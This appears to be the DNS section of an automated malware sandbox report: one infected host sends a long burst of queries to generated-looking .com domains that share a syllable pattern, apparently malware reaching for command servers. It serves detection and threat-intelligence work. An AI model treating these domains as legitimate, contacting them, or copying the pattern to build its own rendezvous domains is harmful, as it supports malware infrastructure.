                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.343518019 CET192.168.2.61.1.1.10xcdb4Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.344399929 CET192.168.2.61.1.1.10xae17Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.345057964 CET192.168.2.61.1.1.10x5b10Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.562999010 CET192.168.2.61.1.1.10x614eStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.868071079 CET192.168.2.61.1.1.10x63fbStandard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.885309935 CET192.168.2.61.1.1.10xc43cStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.887861967 CET192.168.2.61.1.1.10x11a0Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.888211966 CET192.168.2.61.1.1.10x3e5dStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.888828039 CET192.168.2.61.1.1.10xc04dStandard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.891716957 CET192.168.2.61.1.1.10x844cStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.893820047 CET192.168.2.61.1.1.10xbb8dStandard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894042969 CET192.168.2.61.1.1.10x3a62Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894665003 CET192.168.2.61.1.1.10x71b7Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894685984 CET192.168.2.61.1.1.10xcb1Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895222902 CET192.168.2.61.1.1.10x409cStandard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895507097 CET192.168.2.61.1.1.10x48f6Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896193981 CET192.168.2.61.1.1.10xad62Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896756887 CET192.168.2.61.1.1.10xd6c6Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896922112 CET192.168.2.61.1.1.10xc665Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897583961 CET192.168.2.61.1.1.10xed49Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897785902 CET192.168.2.61.1.1.10xc357Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898298979 CET192.168.2.61.1.1.10xc57fStandard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898662090 CET192.168.2.61.1.1.10x91e4Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898827076 CET192.168.2.61.1.1.10xc65eStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.899715900 CET192.168.2.61.1.1.10xee16Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903327942 CET192.168.2.61.1.1.10xf278Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903650045 CET192.168.2.61.1.1.10xd3f6Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.911853075 CET192.168.2.61.1.1.10x5680Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.215666056 CET192.168.2.61.1.1.10x8194Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255040884 CET192.168.2.61.1.1.10xaf6aStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255260944 CET192.168.2.61.1.1.10x61b3Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255413055 CET192.168.2.61.1.1.10xa018Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255559921 CET192.168.2.61.1.1.10x854fStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255709887 CET192.168.2.61.1.1.10x30bcStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255865097 CET192.168.2.61.1.1.10x654fStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255995035 CET192.168.2.61.1.1.10x15e0Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256134033 CET192.168.2.61.1.1.10x64adStandard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256274939 CET192.168.2.61.1.1.10xfa03Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256417036 CET192.168.2.61.1.1.10x5bcbStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256548882 CET192.168.2.61.1.1.10x1552Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256777048 CET192.168.2.61.1.1.10x4c86Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.257107019 CET192.168.2.61.1.1.10xd86dStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.257570982 CET192.168.2.61.1.1.10xd431Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.260605097 CET192.168.2.61.1.1.10xd5d7Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.288191080 CET192.168.2.61.1.1.10xcd78Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291335106 CET192.168.2.61.1.1.10x4a47Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291459084 CET192.168.2.61.1.1.10xff66Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291595936 CET192.168.2.61.1.1.10x6cc6Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291686058 CET192.168.2.61.1.1.10xf754Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291990042 CET192.168.2.61.1.1.10x97d0Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292171955 CET192.168.2.61.1.1.10x87cbStandard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292325020 CET192.168.2.61.1.1.10x9445Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292578936 CET192.168.2.61.1.1.10xabc2Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.292706013 CET192.168.2.61.1.1.10xc4ffStandard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.293225050 CET192.168.2.61.1.1.10xe536Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.293478012 CET192.168.2.61.1.1.10x4713Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.293653965 CET192.168.2.61.1.1.10x2075Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.301799059 CET192.168.2.61.1.1.10xd3baStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.301966906 CET192.168.2.61.1.1.10x31a1Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302203894 CET192.168.2.61.1.1.10xcda8Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302457094 CET192.168.2.61.1.1.10xfc09Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302603006 CET192.168.2.61.1.1.10x639aStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302651882 CET192.168.2.61.1.1.10xd6d9Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302803040 CET192.168.2.61.1.1.10x571fStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302858114 CET192.168.2.61.1.1.10x2298Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.302994013 CET192.168.2.61.1.1.10xccebStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319021940 CET192.168.2.61.1.1.10x55b2Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319180012 CET192.168.2.61.1.1.10x7f7dStandard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319345951 CET192.168.2.61.1.1.10x6804Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319506884 CET192.168.2.61.1.1.10x21d4Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.319665909 CET192.168.2.61.1.1.10x699dStandard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.594654083 CET192.168.2.61.1.1.10x4546Standard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.969789028 CET192.168.2.61.1.1.10xe990Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.972019911 CET192.168.2.61.1.1.10xf615Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.974755049 CET192.168.2.61.1.1.10x2a6fStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.979624033 CET192.168.2.61.1.1.10xe65eStandard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.985287905 CET192.168.2.61.1.1.10x3a4eStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.987158060 CET192.168.2.61.1.1.10xd616Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.987921953 CET192.168.2.61.1.1.10xee47Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.988287926 CET192.168.2.61.1.1.10x12c2Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.988682032 CET192.168.2.61.1.1.10xf3dcStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.989121914 CET192.168.2.61.1.1.10x4c5fStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.989191055 CET192.168.2.61.1.1.10xf824Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.989551067 CET192.168.2.61.1.1.10x6dc9Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.990243912 CET192.168.2.61.1.1.10xe570Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.990411997 CET192.168.2.61.1.1.10x9606Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.990763903 CET192.168.2.61.1.1.10x1aa9Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.991035938 CET192.168.2.61.1.1.10x607Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.991497993 CET192.168.2.61.1.1.10x5fddStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.992016077 CET192.168.2.61.1.1.10x4ea1Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.992156982 CET192.168.2.61.1.1.10x9e0fStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.993199110 CET192.168.2.61.1.1.10x2607Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.993808985 CET192.168.2.61.1.1.10xaafStandard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.993999958 CET192.168.2.61.1.1.10xc8bbStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.994533062 CET192.168.2.61.1.1.10x5b6dStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.994709015 CET192.168.2.61.1.1.10x6923Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.995237112 CET192.168.2.61.1.1.10x61fStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.995330095 CET192.168.2.61.1.1.10xc26bStandard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.999603033 CET192.168.2.61.1.1.10x75c3Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.999867916 CET192.168.2.61.1.1.10x2fceStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.000200033 CET192.168.2.61.1.1.10xbd3fStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.002039909 CET192.168.2.61.1.1.10xb647Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.003237963 CET192.168.2.61.1.1.10xb138Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.007708073 CET192.168.2.61.1.1.10x434bStandard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.012691975 CET192.168.2.61.1.1.10x5702Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.019654036 CET192.168.2.61.1.1.10xd499Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025002956 CET192.168.2.61.1.1.10x3146Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.026726007 CET192.168.2.61.1.1.10x90d7Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.053524971 CET192.168.2.61.1.1.10xb24fStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.055414915 CET192.168.2.61.1.1.10x6b6aStandard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.258965969 CET192.168.2.61.1.1.10xc29fStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260139942 CET192.168.2.61.1.1.10x6dc6Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260448933 CET192.168.2.61.1.1.10x9fc0Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260950089 CET192.168.2.61.1.1.10x45ddStandard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261347055 CET192.168.2.61.1.1.10xc017Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261627913 CET192.168.2.61.1.1.10x76faStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261826038 CET192.168.2.61.1.1.10x7ae0Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262181044 CET192.168.2.61.1.1.10x50f9Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262254000 CET192.168.2.61.1.1.10x7981Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262562990 CET192.168.2.61.1.1.10x2e8fStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262741089 CET192.168.2.61.1.1.10x6eabStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.263015985 CET192.168.2.61.1.1.10xb238Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.264542103 CET192.168.2.61.1.1.10x4fb7Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265055895 CET192.168.2.61.1.1.10x33f6Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265445948 CET192.168.2.61.1.1.10x3de4Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265610933 CET192.168.2.61.1.1.10x3e59Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265939951 CET192.168.2.61.1.1.10xddfdStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272665024 CET192.168.2.61.1.1.10x2ed8Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.273025036 CET192.168.2.61.1.1.10x4b1dStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.275070906 CET192.168.2.61.1.1.10x1042Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.276149035 CET192.168.2.61.1.1.10x4ff3Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.507536888 CET192.168.2.61.1.1.10xde2cStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.509537935 CET192.168.2.61.1.1.10xe75cStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.106549978 CET192.168.2.61.1.1.10xd8dcStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.108784914 CET192.168.2.61.1.1.10xeaeeStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.108943939 CET192.168.2.61.1.1.10x9ba0Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.292850018 CET192.168.2.61.1.1.10x29e3Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.293374062 CET192.168.2.61.1.1.10x6385Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.293946028 CET192.168.2.61.1.1.10x7367Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.294572115 CET192.168.2.61.1.1.10xd57eStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.299303055 CET192.168.2.61.1.1.10x6e33Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300474882 CET192.168.2.61.1.1.10xb244Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300822020 CET192.168.2.61.1.1.10x34aStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301237106 CET192.168.2.61.1.1.10xf42dStandard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301476002 CET192.168.2.61.1.1.10xc38aStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301819086 CET192.168.2.61.1.1.10xac52Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.302259922 CET192.168.2.61.1.1.10x6b9cStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304255009 CET192.168.2.61.1.1.10xd346Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.318511963 CET192.168.2.61.1.1.10xd80bStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.320471048 CET192.168.2.61.1.1.10xec7bStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.320492983 CET192.168.2.61.1.1.10xbea8Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.321589947 CET192.168.2.61.1.1.10xc40cStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.321742058 CET192.168.2.61.1.1.10xa830Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322115898 CET192.168.2.61.1.1.10xfa26Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322369099 CET192.168.2.61.1.1.10x5e2cStandard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322585106 CET192.168.2.61.1.1.10x5aa9Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322808981 CET192.168.2.61.1.1.10xf377Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.323040009 CET192.168.2.61.1.1.10xaceStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.330336094 CET192.168.2.61.1.1.10xe40fStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.331248999 CET192.168.2.61.1.1.10x1d6eStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.342077017 CET192.168.2.61.1.1.10x5de9Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.351772070 CET192.168.2.61.1.1.10x3081Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.356265068 CET192.168.2.61.1.1.10x22dcStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367012978 CET192.168.2.61.1.1.10x55c5Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367635012 CET192.168.2.61.1.1.10x9c2Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367661953 CET192.168.2.61.1.1.10x7bbbStandard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367980003 CET192.168.2.61.1.1.10xcf0eStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368146896 CET192.168.2.61.1.1.10x903eStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368264914 CET192.168.2.61.1.1.10x3903Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368479967 CET192.168.2.61.1.1.10x9299Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368987083 CET192.168.2.61.1.1.10xa83cStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.371277094 CET192.168.2.61.1.1.10x2b87Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.371550083 CET192.168.2.61.1.1.10x719aStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.372395992 CET192.168.2.61.1.1.10x31d6Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.380916119 CET192.168.2.61.1.1.10x20bbStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.381063938 CET192.168.2.61.1.1.10x14b3Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383220911 CET192.168.2.61.1.1.10x309bStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383456945 CET192.168.2.61.1.1.10xab45Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383521080 CET192.168.2.61.1.1.10xb275Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383761883 CET192.168.2.61.1.1.10x8cecStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.384449959 CET192.168.2.61.1.1.10xe014Standard query (0)pumywov.comA (IP address)IN (0x0001)false
